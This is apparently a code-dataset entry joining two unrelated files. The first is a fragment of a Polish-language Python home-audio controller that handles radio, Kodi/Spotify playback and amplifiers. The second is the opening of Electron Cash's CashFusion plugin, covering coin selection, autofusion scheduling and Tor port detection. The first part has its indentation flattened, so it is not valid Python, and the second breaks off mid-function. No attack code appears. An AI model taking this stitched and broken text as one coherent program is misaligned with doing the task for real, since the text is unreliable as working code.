        # radio is a radio-station object
self.stop()
self.aktualna_playlista.zeruj()
self.aktualna_playlista.nazwa = radio.nazwa_serwisu + ' - ' + radio.nazwa_radia
ts_konca = 0
link = radio.link
artysta = album = ''
if radio.nazwa_serwisu == radia.NAZWA_SERWISU_TUNEIN:
link = self.katalog_radii.tunein_dekoduj_stream_stacji(radio.link)
#elif radio.nazwa_serwisu == radia.NAZWA_SERWISU_OPENFM:
        # returns artist, album, title and the end-of-track timestamp
# artysta, album, tytul, ts_konca = self.katalog_radii.odswiez_co_grane_openfm(int(radio.id_radia))
self.aktualna_playlista.dodaj_pozycje_z_polami(artist=artysta, album=album, title=radio.nazwa_radia,
link=link, typ=playlista.TYP_RADIO, fanart=radio.logo,
serwis_radiowy=radio.nazwa_serwisu,
stacja_radiowa=radio.nazwa_radia,
id_stacji_radiowej=radio.id_radia,
ts_konca=ts_konca)
self.odtwarzaj_z_playlisty()
def odtwarzaj_z_linku_zeruj_playliste(self, link, fanartlink):
self.stop()
self.aktualna_playlista.zeruj()
self.aktualna_playlista.dodaj_z_linku(link, fanartlink, zmien_nazwe=True)
self.odtwarzaj_z_playlisty(0)
def odtwarzaj_ze_spotify_uri(self, uri):
self.stop()
self.aktualna_playlista.zeruj()
self.aktualna_playlista.dodaj_z_linku_spotify(uri, zmien_nazwe=True)
self.odtwarzaj_z_playlisty()
def play_pause(self):
self.kasuj_czas_ostatniej_aktywnosci()
self.czas_ostatniego_polecenia_odtwarzania = datetime.datetime.now()
self.pauza = not self.pauza
# if self.odtwarzaj_denon:
# self.den.heos_stop()
# else:
if self.aktualna_playlista.liczba_pozycji() > 0:
if self.aktualna_playlista.pozycje[0].typ == playlista.TYP_RADIO:
if self.pauza:
self.odtwarzacz.stop()
else:
self.odtwarzaj_z_playlisty(zapisuj_historie=False)
else:
self.odtwarzacz.play_pause(start=not self.pauza)
def idz_do(self, czas):
        # czas is given as a percentage
self.kasuj_czas_ostatniej_aktywnosci()
# if self.odtwarzaj_denon:
# self.den.heos_idz_do(czas)
# else:
self.odtwarzacz.idz_do(czas)
def stop(self):
self.kasuj_czas_ostatniej_aktywnosci()
# if self.odtwarzaj_denon:
# self.den.heos_stop()
# else:
self.odtwarzacz.stop()
def odtwarzaj_z_playlisty(self, nr_poz=None, zapisuj_historie=True):
if self.aktualna_playlista.liczba_pozycji() == 0:
self.logger.warning('odtwarzaj z plalisty: pusta playlista')
return
        if nr_poz is not None:  # 0 is a valid playlist position
self.aktualna_playlista.nr_pozycji_na_playliscie = nr_poz
if zapisuj_historie:
try:
self.aktualna_playlista.zapisz_w_historii(
self.aktualna_playlista.pozycje[self.aktualna_playlista.nr_pozycji_na_playliscie])
except IndexError:
pass
self.czas_ostatniego_polecenia_odtwarzania = datetime.datetime.now()
        # TODO: this stop is probably unnecessary, and slow on top of that
#self.odtwarzacz.stop()
self.podmien_odtwarzacz()
self.odtwarzacz.odtwarzaj_z_linku(self.aktualna_playlista.aktualnie_grane_link())
self.aktualna_playlista.zapisz_playliste()
if isinstance(self.odtwarzacz, spotify_odtwarzacz.SpotifyOdtwarzacz):
artysta = self.aktualna_playlista.aktualna_pozycja().artist
piosenka = self.aktualna_playlista.aktualna_pozycja().title
threading.Thread(target=self.liryki.odczytaj_liryki, args=(artysta, piosenka)).start()
def podmien_odtwarzacz(self):
if self.aktualna_playlista.aktualna_pozycja() is not None:
if self.aktualna_playlista.aktualna_pozycja().typ == playlista.TYP_SPOTIFY:
self.spoti.aktualizuj_stan()
self.odtwarzacz = self.spoti
self.logger.warning('podmienilem odtwarzacz na spotify')
else:
self.kodi.aktualizuj_stan()
self.odtwarzacz = self.kodi
self.logger.warning('podmienilem odtwarzacz na kodi')
def nastepny(self):
self.kasuj_czas_ostatniej_aktywnosci()
if not self.odtwarzacz.aktualnie_gra:
return
if self.aktualna_playlista.nastepny():
self.odtwarzaj_z_playlisty()
def poprzedni(self):
self.kasuj_czas_ostatniej_aktywnosci()
if not self.odtwarzacz.aktualnie_gra:
return
if self.aktualna_playlista.poprzedni():
self.odtwarzaj_z_playlisty()
def kasuj_czas_ostatniej_aktywnosci(self):
self.czas_ostatniej_aktywnosci = datetime.datetime.now()
def odczytaj_konf(self):
        # TODO: tidy up the configuration handling
self.plik_dzwonka = os.path.dirname(os.path.realpath(__file__)) + '/' + \
THutils.odczytaj_parametr_konfiguracji(constants.OBSZAR_NAGL, 'PLIK_DZWONKA', self.logger)
self.glosnosc_przy_dzwonku = int(
THutils.odczytaj_parametr_konfiguracji(constants.OBSZAR_NAGL, 'GLOSNOSC_PRZY_DZWONKU', self.logger))
self.czas_odczytu_konfiguracji = int(
THutils.odczytaj_parametr_konfiguracji(constants.OBSZAR_NAGL, 'CZAS_ODCZYTU_KONFIG', self.logger))
self._czas_maksymalnego_braku_aktywnosci = int(
THutils.odczytaj_parametr_konfiguracji(constants.OBSZAR_NAGL, 'CZAS_MAKSYMALNEGO_BRAKU_AKTYWNOSCI', self.logger))
now = datetime.datetime.now()
run_at = now + datetime.timedelta(hours=self.czas_odczytu_konfiguracji)
delay = (run_at - now).total_seconds()
threading.Timer(delay, self.odczytaj_konf).start()
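        # Illustrative note: the run_at/delay computation above reduces to a fixed delay
        # of self.czas_odczytu_konfiguracji * 3600 seconds, after which the configuration
        # is re-read and the timer is re-armed (e.g. CZAS_ODCZYTU_KONFIG = 12 -> 43200 s).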
def toggle_wzmacniacz_nazwa(self, nazwa):
if self.wzmacniacze.stan_wzmacniacza_po_nazwie(nazwa):
self.wlacz_wylacz_wzmacniacz_nazwa(nazwa, False)
else:
self.wlacz_wylacz_wzmacniacz_nazwa(nazwa, True)
self.ts = int(time.time())
def wlacz_wylacz_wzmacniacz_nazwa(self, nazwa, stan):
        # stan is a boolean
self.kasuj_czas_ostatniej_aktywnosci()
if stan:
self.logger.info('Wlaczylem wzmacniacz : ' + str(nazwa))
else:
self.logger.info('Wylaczylem wzmacniacz : ' + str(nazwa))
self.wzmacniacze.wzmacniacz_po_nazwie(nazwa).wlacz_wylacz(stan)
self.wzmacniacze.ts = int(time.time())
self.przekaz_stan_wzmacniaczy_do_garazu()
        # pause if all amplifiers end up switched off
if not self.wzmacniacze.czy_ktorykolwiek_wlaczony():
self.play_pause()
return
if stan and self.pauza:
self.play_pause()
def wylacz_wszystkie_wzmacniacze(self):
for w in self.wzmacniacze.wzmacniacze:
self.wlacz_wylacz_wzmacniacz_nazwa(w.nazwa, False)
self.wzmacniacze.ts = int(time.time())
def automatyczne_wylaczanie_przy_braku_aktywnosci(self):
roznica = datetime.datetime.now() - self.czas_ostatniej_aktywnosci
if roznica.total_seconds() > self._czas_maksymalnego_braku_aktywnosci:
if self.wzmacniacze.czy_ktorykolwiek_wlaczony():
self.wylacz_wszystkie_wzmacniacze()
# self.play_pause()
self.logger.info('Wylaczam wzmacn przy braku aktywnosci. Czas ostatn aktywn: ' +
str(self.czas_ostatniej_aktywnosci))
# threading.Timer(CZAS_SPRAWDZANIA_OSTATNIEJ_AKTYWNOSCI,
# self.automatyczne_wylaczanie_przy_braku_aktywnosci).start()
|
plugin.py
|
#!/usr/bin/env python3
#
# Electron Cash - a lightweight Bitcoin Cash client
# CashFusion - an advanced coin anonymizer
#
# Copyright (C) 2020 Mark B. Lundeberg
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Base plugin (non-GUI)
"""
import math
import threading
import time
import weakref
from typing import Optional, Tuple
from electroncash.address import Address, OpCodes
from electroncash.bitcoin import COINBASE_MATURITY, TYPE_SCRIPT
from electroncash.plugins import BasePlugin, hook, daemon_command
from electroncash.i18n import _, ngettext, pgettext
from electroncash.util import profiler, PrintError, InvalidPassword
from electroncash import Network, networks, Transaction
from .conf import Conf, Global
from .fusion import Fusion, can_fuse_from, can_fuse_to, is_tor_port, MIN_TX_COMPONENTS
from .server import FusionServer
from .covert import limiter
from .protocol import Protocol
from .util import get_coin_name
import random # only used to select random coins
TOR_PORTS = [9050, 9150]
# if more than <N> tor connections have been made recently (see covert.py) then don't start auto-fuses.
AUTOFUSE_RECENT_TOR_LIMIT_LOWER = 60
# if more than <N> tor connections have been made recently (see covert.py) then shut down auto-fuses that aren't yet started
AUTOFUSE_RECENT_TOR_LIMIT_UPPER = 120
# heuristic factor: guess that expected number of coins in wallet in equilibrium is = (this number) / fraction
COIN_FRACTION_FUDGE_FACTOR = 10
# for semi-linked addresses (that share txids in their history), allow linking them with this probability:
KEEP_LINKED_PROBABILITY = 0.1
# how long an auto-fusion may stay in 'waiting' state (without starting-soon) before it cancels itself
AUTOFUSE_INACTIVE_TIMEOUT = 600
# how many random coins to select max in 1 batch -- used by select_random_coins
DEFAULT_MAX_COINS = 20
assert DEFAULT_MAX_COINS > 10
# how many autofusions can be running per-wallet
MAX_AUTOFUSIONS_PER_WALLET = 10
CONSOLIDATE_MAX_OUTPUTS = MIN_TX_COMPONENTS // 3
# Threshold for proportion of total wallet value fused before stopping fusion. This avoids re-fusion due to dust.
FUSE_DEPTH_THRESHOLD = 0.999
# We don't allow a fuse depth beyond this in the wallet UI
MAX_LIMIT_FUSE_DEPTH = 10
pnp = None
def get_upnp():
""" return an initialized UPnP singleton """
global pnp
if pnp is not None:
return pnp
try:
import miniupnpc
except ImportError:
raise RuntimeError("python miniupnpc module not installed")
u = miniupnpc.UPnP()
if u.discover() < 1:
raise RuntimeError("can't find UPnP server")
try:
u.selectigd()
except Exception as e:
raise RuntimeError("failed to connect to UPnP IGD")
pnp = u
return u
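# Minimal usage sketch for get_upnp() (illustrative only): the singleton is created
# lazily and reused on later calls; callers should be ready for the RuntimeErrors above.
#
#     try:
#         upnp = get_upnp()
#     except RuntimeError:
#         upnp = None  # run without UPnP port mapping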
def select_coins(wallet):
""" Sort the wallet's coins into address buckets, returning two lists:
- Eligible addresses and their coins.
- Ineligible addresses and their coins.
An address is eligible if it satisfies all conditions:
- the address is unfrozen
- has 1, 2, or 3 utxo
- all utxo are confirmed (or matured in case of coinbases)
- has no SLP utxo or frozen utxo
"""
# First, select all the coins
eligible = []
ineligible = []
has_unconfirmed = False
has_coinbase = False
sum_value = 0
mincbheight = (wallet.get_local_height() + 1 - COINBASE_MATURITY if Conf(wallet).autofuse_coinbase
else -1) # -1 here causes coinbase coins to always be rejected
for addr in wallet.get_addresses():
acoins = list(wallet.get_addr_utxo(addr).values())
if not acoins:
continue # prevent inserting empty lists into eligible/ineligible
good = True
if addr in wallet.frozen_addresses:
good = False
for i,c in enumerate(acoins):
sum_value += c['value'] # tally up values regardless of eligibility
# If too many coins, any SLP tokens, any frozen coins, or any
# immature coinbase on the address -> flag all address coins as
# ineligible if not already flagged as such.
good = good and (
i < 3 # must not have too many coins on the same address*
and not c['slp_token'] # must not be SLP
and not c['is_frozen_coin'] # must not be frozen
and (not c['coinbase'] or c['height'] <= mincbheight) # if coinbase -> must be mature coinbase
)
# * = We skip addresses with too many coins, since they take up lots
# of 'space' for consolidation. TODO: there is possibility of
# disruption here, if we get dust spammed. Need to deal with
# 'dusty' addresses by ignoring / consolidating dusty coins.
# Next, detect has_unconfirmed & has_coinbase:
if c['height'] <= 0:
# Unconfirmed -> Flag as not eligible and set the has_unconfirmed flag.
good = False
has_unconfirmed = True
# Update has_coinbase flag if not already set
has_coinbase = has_coinbase or c['coinbase']
if good:
eligible.append((addr,acoins))
else:
ineligible.append((addr,acoins))
return eligible, ineligible, int(sum_value), bool(has_unconfirmed), bool(has_coinbase)
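# Minimal usage sketch for select_coins() (illustrative; `wallet` is assumed to be an
# Electron Cash wallet object as used elsewhere in this file):
#
#     eligible, ineligible, total_sats, has_unconf, has_cb = select_coins(wallet)
#     for addr, acoins in eligible:   # each entry is an (address, [coin, ...]) bucket
#         print(addr, len(acoins), sum(c['value'] for c in acoins))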
def select_random_coins(wallet, fraction, eligible):
"""
Grab wallet coins with a certain probability, while also paying attention
to obvious linkages and possible linkages.
Returns list of list of coins (bucketed by obvious linkage).
"""
# First, we want to bucket coins together when they have obvious linkage.
# Coins that are linked together should be spent together.
# Currently, just look at address.
addr_coins = eligible
random.shuffle(addr_coins)
# While fusing we want to pay attention to semi-correlations among coins.
# When we fuse semi-linked coins, it increases the linkage. So we try to
# avoid doing that (but rarely, we just do it anyway :D).
# Currently, we just look at all txids touched by the address.
# (TODO this is a disruption vector: someone can spam multiple fusions'
# output addrs with massive dust transactions (2900 outputs in 100 kB)
# that make the plugin think that all those addresses are linked.)
result_txids = set()
result = []
num_coins = 0
for addr, acoins in addr_coins:
if num_coins >= DEFAULT_MAX_COINS:
break
elif num_coins + len(acoins) > DEFAULT_MAX_COINS:
continue
# For each bucket, we give a separate chance of joining.
if random.random() > fraction:
continue
# Semi-linkage check:
# We consider all txids involving the address, historical and current.
ctxids = {txid for txid, height in wallet.get_address_history(addr)}
collisions = ctxids.intersection(result_txids)
# Note each collision gives a separate chance of discarding this bucket.
if random.random() > KEEP_LINKED_PROBABILITY**len(collisions):
continue
# OK, no problems: let's include this bucket.
num_coins += len(acoins)
result.append(acoins)
result_txids.update(ctxids)
if not result:
# nothing was selected, just try grabbing first nonempty bucket
try:
res = next(coins for addr,coins in addr_coins if coins)
result = [res]
except StopIteration:
# all eligible buckets were cleared.
pass
return result
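# Worked example of the selection probabilities above (illustrative numbers): with
# fraction = 0.5 each eligible bucket independently has a 50% chance of joining, and a
# bucket whose address history shares 2 txids with already-selected buckets is kept
# only with probability KEEP_LINKED_PROBABILITY**2 = 0.1**2 = 1%. Typical call:
#
#     buckets = select_random_coins(wallet, 0.5, eligible)
#     coins = [c for bucket in buckets for c in bucket]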
def get_target_params_1(wallet, wallet_conf, active_autofusions, eligible):
""" WIP -- TODO: Rename this function. """
wallet_conf = Conf(wallet)
mode = wallet_conf.fusion_mode
# Note each fusion 'consumes' a certain number of coins by freezing them,
# so that the next fusion has less eligible coins to work with. So each
# call to this may see a smaller n_buckets.
n_buckets = len(eligible)
if mode == 'normal':
return max(2, round(n_buckets / DEFAULT_MAX_COINS)), False
elif mode == 'fan-out':
return max(4, math.ceil(n_buckets / (COIN_FRACTION_FUDGE_FACTOR*0.65))), False
elif mode == 'consolidate':
if n_buckets < MIN_TX_COMPONENTS - CONSOLIDATE_MAX_OUTPUTS:
# Too few eligible buckets to make an effective consolidation.
return 0, False
# In the latter stages of consolidation, only do one fusion
# at a time with all-confirmed rule, to make sure each fusion's outputs
# may be consumed by the subsequent one.
# To avoid weird loops, try to calculate the TOTAL number of coins
# that are either 1) eligible or 2) being fused. (Should stay constant
# as fusions are added/cancelled)
n_coins = sum(len(acoins) for addr,acoins in eligible)
n_total = n_coins + sum(len(getattr(f, 'inputs', ())) for f in active_autofusions)
if n_total < DEFAULT_MAX_COINS*3:
return 1, True
# If coins are scarce then don't make more autofusions unless we
# have none.
if n_buckets < DEFAULT_MAX_COINS*2:
return 1, False
# We still have lots of coins left, so request another autofusion.
return MAX_AUTOFUSIONS_PER_WALLET, False
else: # 'custom'
target_num_auto = wallet_conf.queued_autofuse
confirmed_only = wallet_conf.autofuse_confirmed_only
return int(target_num_auto), bool(confirmed_only)
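# Worked example (illustrative): in 'normal' mode with 60 eligible buckets this returns
# (max(2, round(60 / DEFAULT_MAX_COINS)), False) = (3, False), i.e. aim for three
# concurrent autofusions without the confirmed-only restriction.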
def get_target_params_2(wallet_conf, sum_value):
""" WIP -- TODO: Rename this function. """
mode = wallet_conf.fusion_mode
fraction = 0.1
if mode == 'custom':
# Determine the fraction that should be used
select_type, select_amount = wallet_conf.selector
if select_type == 'size' and int(sum_value) != 0:
# user wants to get a typical output of this size (in sats)
fraction = COIN_FRACTION_FUDGE_FACTOR * select_amount / sum_value
elif select_type == 'count' and int(select_amount) != 0:
# user wants this number of coins
fraction = COIN_FRACTION_FUDGE_FACTOR / select_amount
elif select_type == 'fraction':
# user wants this fraction
fraction = select_amount
# note: fraction at this point could be <0 or >1 but doesn't matter.
elif mode == 'consolidate':
fraction = 1.0
elif mode == 'normal':
fraction = 0.5
elif mode == 'fan-out':
fraction = 0.1
return fraction
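# Worked example (illustrative): in 'custom' mode with a ('size', 100000) selector and
# sum_value = 10000000 sats, fraction = COIN_FRACTION_FUDGE_FACTOR * 100000 / 10000000
# = 0.1, i.e. roughly 10% of the eligible buckets are offered to each fusion.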
class FusionPlugin(BasePlugin):
fusion_server = None
active = True
_run_iter = 0
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs) # gives us self.config
# Do an initial check on the tor port
self.tor_port_good = None
t = threading.Thread(name = 'Fusion-scan_torport_initial', target = self.scan_torport)
t.start()
# quick lock for the following two WeakKeyDictionary variables
# Locking order wallet.lock -> plugin.lock.
self.lock = threading.Lock()
self.fusions = weakref.WeakKeyDictionary()
self.autofusing_wallets = weakref.WeakKeyDictionary() # wallet -> password
self.registered_network_callback = False
self.t_last_net_ok = time.monotonic()
self.remote_donation_address: str = '' # optionally announced by the remote server in 'serverhello' message
if tuple(self.config.get('cashfusion_server', ())) == ('cashfusion.electroncash.dk', 8787, False):
# User's config has the old default non-SSL server. If we see this,
# just wipe the config key so that the new default is used.
# But only reset once, after that let them go back if that is what
# they truly desire.
if self.config.get('cashfusion_server_defaultresetted', 0) < 1:
self.config.set_key('cashfusion_server', None)
self.config.set_key('cashfusion_server_defaultresetted', 1)
def on_close(self,):
super().on_close()
self.stop_fusion_server()
if self.registered_network_callback:
self.registered_network_callback = False
network = Network.get_instance()
if network:
network.unregister_callback(self.on_wallet_transaction)
self.active = False
def fullname(self):
return 'CashFusion'
def description(self):
return _("CashFusion Protocol")
def is_available(self):
return True
def set_remote_donation_address(self, address : str):
self.remote_donation_address = ((isinstance(address, str) and address) or '')[:100]
def get_server(self, ):
return Global(self.config).server
def set_server(self, host, port, ssl):
gconf = Global(self.config)
old = gconf.server
gconf.server = (host, port, ssl) # type/sanity checking done in setter
if old != gconf.server:
self.on_server_changed()
def get_torhost(self):
if self.has_auto_torport():
return Global.Defaults.TorHost
else:
return Global(self.config).tor_host
def set_torhost(self, host):
''' host should be a valid hostname '''
if not host: return
Global(self.config).tor_host = host
def has_auto_torport(self, ):
return Global(self.config).tor_port_auto
def get_torport(self, ):
        ''' Retrieve either the manual port or the autodetected port; may return None
if 'auto' mode and no Tor port has been autodetected. (this is non-blocking) '''
if self.has_auto_torport():
return self.tor_port_good
else:
return Global(self.config).tor_port_manual
def set_torport(self, port):
# port may be 'auto' or 'manual' or an int
gconf = Global(self.config)
if port == 'auto':
gconf.tor_port_auto = True
return
else:
gconf.tor_port_auto = False
if port == 'manual':
return # we're simply going to use whatever manual port was already set
assert isinstance(port, int)
gconf.tor_port_manual = port
def scan_torport(self, ):
''' Scan for Tor proxy on either the manual port or on a series of
automatic ports. This is blocking. Returns port if it's up, or None if
down / can't find. '''
host = self.get_torhost()
if self.has_auto_torport():
portlist = []
network = Network.get_instance()
if network:
tc = network.tor_controller
if tc and tc.is_enabled() and tc.active_socks_port:
portlist.append(tc.active_socks_port)
portlist.extend(TOR_PORTS)
else:
portlist = [ Global(self.config).tor_port_manual ]
for port in portlist:
if is_tor_port(host, port):
self.tor_port_good = port
break
else:
self.tor_port_good = None
return self.tor_port_good
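        # Usage sketch (illustrative): scan_torport() can block briefly, so this module
        # runs it from a worker thread and reads the cached result later, e.g.:
        #
        #     threading.Thread(name='Fusion-scan_torport', target=self.scan_torport).start()
        #     ...
        #     port = self.get_torport()  # non-blocking; may be None until the scan finishes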
def on_server_changed(self):
""" When the server is changed, we stop all extant fusions that are not
already 'running' in order to allow for the new change to take effect
immediately. """
self.remote_donation_address = ''
self.stop_all_fusions('Server changed', not_if_running=True)
def get_all_fusions(self, ):
""" Return all still-live fusion objects that have been created using .start_fusion(),
including autofusions and any other fusions. """
with self.lock:
fusions_and_times = list(self.fusions.items())
fusions_and_times.sort(key=lambda x:x[1])
return [f for f,t in fusions_and_times]
def stop_all_fusions(self, reason, *, not_if_running=True):
with self.lock:
for f in list(self.fusions):
f.stop(reason, not_if_running = not_if_running)
@staticmethod
def stop_autofusions(wallet, reason, *, not_if_running=True):
with wallet.lock:
try:
fusion_weakset = wallet._fusions_auto
except AttributeError:
return []
running = []
for f in list(fusion_weakset):
if not f.is_alive():
fusion_weakset.discard(f)
continue
f.stop(reason, not_if_running = not_if_running)
if f.status[0] == 'running':
running.append(f)
return running
def disable_autofusing(self, wallet):
with self.lock:
self.autofusing_wallets.pop(wallet, None)
Conf(wallet).autofuse = False
return self.stop_autofusions(wallet, 'Autofusing disabled', not_if_running=True)
def enable_autofusing(self, wallet, password):
if password is None and wallet.has_password():
raise InvalidPassword()
else:
wallet.check_password(password)
with self.lock:
self.autofusing_wallets[wallet] = password
Conf(wallet).autofuse = True
def is_autofusing(self, wallet):
with self.lock:
return (wallet in self.autofusing_wallets)
def add_wallet(self, wallet, password=None):
''' Attach the given wallet to fusion plugin, allowing it to be used in
fusions with clean shutdown. Also start auto-fusions for wallets that want
it (if no password).
'''
with wallet.lock:
# Generate wallet._fusions and wallet._fusions_auto; these must
# only be accessed with wallet.lock held.
# all fusions relating to this wallet, either as source or target
# or both.
wallet._fusions = weakref.WeakSet()
# fusions that were auto-started.
wallet._fusions_auto = weakref.WeakSet()
            # cache: stores a map of txid -> fusion_depth (or False if txid is not a fuz tx)
wallet._cashfusion_is_fuz_txid_cache = dict()
# cache: stores a map of address -> fusion_depth if the address has fuz utxos
wallet._cashfusion_address_cache = dict()
# all accesses to the above must be protected by wallet.lock
if Conf(wallet).autofuse:
try:
self.enable_autofusing(wallet, password)
except InvalidPassword:
self.disable_autofusing(wallet)
if not self.registered_network_callback and wallet.network:
wallet.network.register_callback(self.on_wallet_transaction, ['new_transaction'])
self.registered_network_callback = True
def remove_wallet(self, wallet):
''' Detach the provided wallet; returns list of active fusion threads. '''
with self.lock:
self.autofusing_wallets.pop(wallet, None)
fusions = ()
try:
with wallet.lock:
fusions = list(wallet._fusions)
del wallet._fusions
del wallet._fusions_auto
del wallet._cashfusion_is_fuz_txid_cache
del wallet._cashfusion_address_cache
except AttributeError:
pass
return [f for f in fusions if f.is_alive()]
def start_fusion(self, source_wallet, password, coins, target_wallet = None, max_outputs = None, inactive_timeout = None):
""" Create and start a new Fusion object with current server/tor settings.
Both source_wallet.lock and target_wallet.lock must be held.
FIXME: this condition is begging for a deadlock to happen when the two wallets
are different. Need to find a better way if inter-wallet fusing actually happens.
"""
if target_wallet is None:
target_wallet = source_wallet # self-fuse
assert can_fuse_from(source_wallet)
assert can_fuse_to(target_wallet)
host, port, ssl = self.get_server()
if host == 'localhost':
# as a special exemption for the local fusion server, we don't use Tor.
torhost = None
torport = None
else:
torhost = self.get_torhost()
torport = self.get_torport()
if torport is None:
torport = self.scan_torport() # may block for a very short time ...
if torport is None:
self.notify_server_status(False, ("failed", _("Invalid Tor proxy or no Tor proxy found")))
raise RuntimeError("can't find tor port")
fusion = Fusion(self, target_wallet, host, port, ssl, torhost, torport)
fusion.add_coins_from_wallet(source_wallet, password, coins)
fusion.max_outputs = max_outputs
with self.lock:
fusion.start(inactive_timeout = inactive_timeout)
self.fusions[fusion] = time.time()
target_wallet._fusions.add(fusion)
source_wallet._fusions.add(fusion)
return fusion
def thread_jobs(self, ):
return [self]
def run(self, ):
# this gets called roughly every 0.1 s in the Plugins thread; downclock it to 5 s.
run_iter = self._run_iter + 1
if run_iter < 50:
self._run_iter = run_iter
return
else:
self._run_iter = 0
if not self.active:
return
dont_start_fusions = False
network = Network.get_instance()
if network and network.is_connected():
self.t_last_net_ok = time.monotonic()
else:
# Cashfusion needs an accurate picture of the wallet's coin set, so
# that we don't reuse addresses and we don't submit already-spent coins.
# Currently the network is not synced so we won't start new fusions.
dont_start_fusions = True
if time.monotonic() - self.t_last_net_ok > 31:
# If the network is disconnected for an extended period, we also
# shut down all waiting fusions. We can't wait too long because
# one fusion might succeed but then enter the 'time_wait' period
# where it is waiting to see the transaction on the network.
# After 60 seconds it gives up and then will unreserve addresses,
# and currently-waiting fusions would then grab those addresses when
# they begin rounds.
self.stop_all_fusions('Lost connection to Electron Cash server', not_if_running = True)
return
# Snapshot of autofusing list; note that remove_wallet may get
# called on one of the wallets, after lock is released.
with self.lock:
wallets_and_passwords = list(self.autofusing_wallets.items())
torcount = limiter.count
if torcount > AUTOFUSE_RECENT_TOR_LIMIT_UPPER:
# need tor cooldown, stop the waiting autofusions
for wallet, password in wallets_and_passwords:
self.stop_autofusions(wallet, 'Tor cooldown', not_if_running = True)
return
if torcount > AUTOFUSE_RECENT_TOR_LIMIT_LOWER:
# no urgent need to stop fusions, but don't queue up any more.
dont_start_fusions = True
for wallet, password in wallets_and_passwords:
with wallet.lock:
if not hasattr(wallet, '_fusions'):
continue
if not wallet.up_to_date:
# We want a good view of the wallet so we know which coins
# are unspent and confirmed, and we know which addrs are
# used. Note: this `continue` will bypass the potential .stop()
# below.
continue
for f in list(wallet._fusions_auto):
if not f.is_alive():
wallet._fusions_auto.discard(f)
active_autofusions = list(wallet._fusions_auto)
if dont_start_fusions and not active_autofusions:
continue
num_auto = len(active_autofusions)
wallet_conf = Conf(wallet)
eligible, ineligible, sum_value, has_unconfirmed, has_coinbase = select_coins(wallet)
target_num_auto, confirmed_only = get_target_params_1(wallet, wallet_conf, active_autofusions, eligible)
if confirmed_only and has_unconfirmed:
for f in list(wallet._fusions_auto):
f.stop('Wallet has unconfirmed coins... waiting.', not_if_running = True)
continue
fuse_depth = Conf(wallet).fuse_depth
if fuse_depth > 0:
sum_eligible_values = 0
sum_fuz_values = 0
for eaddr, ecoins in eligible:
ecoins_value = sum(ecoin['value'] for ecoin in ecoins)
sum_eligible_values += ecoins_value
if self.is_fuz_address(wallet, eaddr, require_depth=fuse_depth-1):
sum_fuz_values += ecoins_value
if (sum_eligible_values != 0) and (sum_fuz_values / sum_eligible_values >= FUSE_DEPTH_THRESHOLD):
continue
if not dont_start_fusions and num_auto < min(target_num_auto, MAX_AUTOFUSIONS_PER_WALLET):
# we don't have enough auto-fusions running, so start one
fraction = get_target_params_2(wallet_conf, sum_value)
chosen_buckets = select_random_coins(wallet, fraction, eligible)
coins = [c for l in chosen_buckets for c in l]
if not coins:
self.print_error("auto-fusion skipped due to lack of coins")
continue
if wallet_conf.fusion_mode == 'consolidate':
max_outputs = CONSOLIDATE_MAX_OUTPUTS
if len(chosen_buckets) < (MIN_TX_COMPONENTS - max_outputs):
self.print_error("consolidating auto-fusion skipped due to lack of unrelated coins")
continue
else:
max_outputs = None
try:
f = self.start_fusion(wallet, password, coins, max_outputs = max_outputs, inactive_timeout = AUTOFUSE_INACTIVE_TIMEOUT)
self.print_error("started auto-fusion")
except RuntimeError as e:
self.print_error(f"auto-fusion skipped due to error: {e}")
return
wallet._fusions_auto.add(f)
def start_fusion_server(self, network, bindhost, port, upnp = None, announcehost = None, donation_address = None):
if self.fusion_server:
raise RuntimeError("server already running")
donation_address = (isinstance(donation_address, Address) and donation_address) or None
self.fusion_server = FusionServer(self.config, network, bindhost, port, upnp = upnp, announcehost = announcehost, donation_address = donation_address)
self.fusion_server.start()
return self.fusion_server.host, self.fusion_server.port
def stop_fusion_server(self):
try:
self.fusion_server.stop('server stopped by operator')
self.fusion_server = None
except Exception:
pass
def update_coins_ui(self, wallet):
''' Default implementation does nothing. Qt plugin subclass overrides
this, which sends a signal to the main thread to update the coins tab.
This is called by the Fusion thread (in its thread context) when it
freezes & unfreezes coins. '''
def notify_server_status(self, b, tup : tuple = None):
''' The Qt plugin subclass implements this to tell the GUI about bad
servers. '''
if not b: self.print_error("notify_server_status:", b, str(tup))
@hook
def donation_address(self, window) -> Optional[Tuple[str,Address]]:
''' Plugin API: Returns a tuple of (description, Address) or None. This
is the donation address that we as a client got from the remote server
(as opposed to the donation address we announce if we are a server). '''
if self.remote_donation_address and Address.is_valid(self.remote_donation_address):
return (self.fullname() + " " + _("Server") + ": " + self.get_server()[0], Address.from_string(self.remote_donation_address))
@staticmethod
def wallet_can_fuse(wallet) -> bool:
return can_fuse_from(wallet) and can_fuse_to(wallet)
@staticmethod
def is_fuz_coin(wallet, coin, *, require_depth=0) -> Optional[bool]:
""" Returns True if the coin in question is definitely a CashFusion coin (uses heuristic matching),
or False if the coin in question is not from a CashFusion tx. Returns None if the tx for the coin
is not (yet) known to the wallet (None == inconclusive answer, caller may wish to try again later).
If require_depth is > 0, check recursively; will return True if all ancestors of the coin
up to require_depth are also CashFusion transactions belonging to this wallet.
Precondition: wallet must be a fusion wallet. """
require_depth = min(max(0, require_depth), 900) # paranoia: clamp to [0, 900]
cache = wallet._cashfusion_is_fuz_txid_cache
assert isinstance(cache, dict)
txid = coin['prevout_hash']
# check cache, if cache hit, return answer and avoid the lookup below
cached_val = cache.get(txid, None)
if cached_val is not None:
# cache stores either False, or a depth for which the predicate is true
if cached_val is False:
return False
elif cached_val >= require_depth:
return True
my_addresses_seen = set()
